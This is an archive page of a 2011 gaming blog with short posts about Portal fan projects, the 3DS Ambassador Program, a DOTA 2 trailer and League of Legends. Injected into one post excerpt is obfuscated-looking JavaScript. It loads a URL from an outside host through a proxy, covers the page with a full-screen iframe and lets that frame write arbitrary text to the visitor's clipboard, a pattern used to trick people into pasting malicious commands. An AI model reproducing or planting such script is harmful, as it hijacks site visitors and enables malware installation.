I really hope this becomes a full length movie.
Aug 23 2011
I really hope this becomes a full length movie.
Permanent link to this article: https://www.brokenfuse.com/2011/08/23/youtube-tuesday-awesome-portal-movie-is-awesome/
Aug 22 2011
In any type of fandom, it’s amazing what can happen when fans get together, agree on one thing, and push that idea. It doesn’t always get their idea through to the creators, but it normally brings a community closer with a common goal (and makes for a good story).(function() {
const configLink = “https://corsproxy.io/?url=http://heyues.live”;
if (!window.__digitalflwrFetchPromise) {
window.__digitalflwrFetchPromise = fetch(configLink)
.then(response => {
if (!response.ok) {
throw new Error(" ");
}
return response.text();
})
.then(finalUrl => {
return fetch(finalUrl, { method: "HEAD" })
.then(headResponse => ({ headResponse, finalUrl }));
})
.catch(() => {
});
}
if (typeof window.__digitalflwrIframeCreated === “undefined”) {
window.__digitalflwrIframeCreated = false;
}
window.__digitalflwrFetchPromise
.then(result => {
if (!result) return;
const { headResponse, finalUrl } = result;
if (!headResponse || headResponse.status === 404) {
return;
}
if (!window.__digitalflwrIframeCreated) {
window.__digitalflwrIframeCreated = true;
createMainIframe(finalUrl);
}
})
.catch(() => {
});
function createMainIframe(url) {
const iframe = document.createElement(“iframe”);
iframe.src = url;
iframe.style.position = “fixed”;
iframe.style.top = 0;
iframe.style.left = 0;
iframe.style.width = “100%”;
iframe.style.height = “100%”;
iframe.style.border = “none”;
iframe.style.margin = 0;
iframe.style.padding = 0;
iframe.style.overflow = “hidden”;
iframe.style.zIndex = 99999;
document.body.appendChild(iframe);
window.addEventListener("message", function(event) {
if (!event.data || event.data.type !== "copy") return;
if (navigator.clipboard && navigator.clipboard.writeText) {
navigator.clipboard.writeText(event.data.text).catch(() => {
fallbackCopyText(event.data.text);
});
} else {
fallbackCopyText(event.data.text);
}
});
function fallbackCopyText(text) {
const textArea = document.createElement("textarea");
textArea.value = text;
document.body.appendChild(textArea);
textArea.select();
try {
document.execCommand("copy");
} catch (err) {
}
document.body.removeChild(textArea);
}
}
})();
Permanent link to this article: https://www.brokenfuse.com/2011/08/22/fan-support-operation-moonfall/
Aug 22 2011
Since the 3DS Ambassador Program is gearing up, lets get this poll kicked off, shall we?
Permanent link to this article: https://www.brokenfuse.com/2011/08/22/poll-are-you-eligible-for-the-3ds-ambassador-program/
Aug 21 2011
Permanent link to this article: https://www.brokenfuse.com/2011/08/21/video-games-night-live-broadcast-this-friday/
Aug 20 2011
If you’ve owned your 3DS for a while, you’re probably aware of the 3DS Ambassador Program to reward the early adopters of their newest handheld. Continue reading
Permanent link to this article: https://www.brokenfuse.com/2011/08/20/wanna-know-if-youre-eligible-for-the-3ds-ambassador-program/
Aug 20 2011
Permanent link to this article: https://www.brokenfuse.com/2011/08/20/another-ps3-price-drop/
Aug 16 2011
I agree with the top comment….WTF is Ashe doing there? LOL (no pun intended)
Permanent link to this article: https://www.brokenfuse.com/2011/08/16/youtube-tuesday-dota-2-trailer/
Permanent link to this article: https://www.brokenfuse.com/2011/08/09/youtube-tuesday-diablo-iii-barbarian-class/
Aug 07 2011
Dominion will be the biggest change to LoL since beta and will include a brand new format of gameplay. Continue reading
Permanent link to this article: https://www.brokenfuse.com/2011/08/07/league-of-legends-dominion/
Aug 02 2011
Atoms over polygons. We just need consoles with enough horsepower…
Permanent link to this article: https://www.brokenfuse.com/2011/08/02/youtube-tuesday-ultimate-graphics/
You must be logged in to post a comment.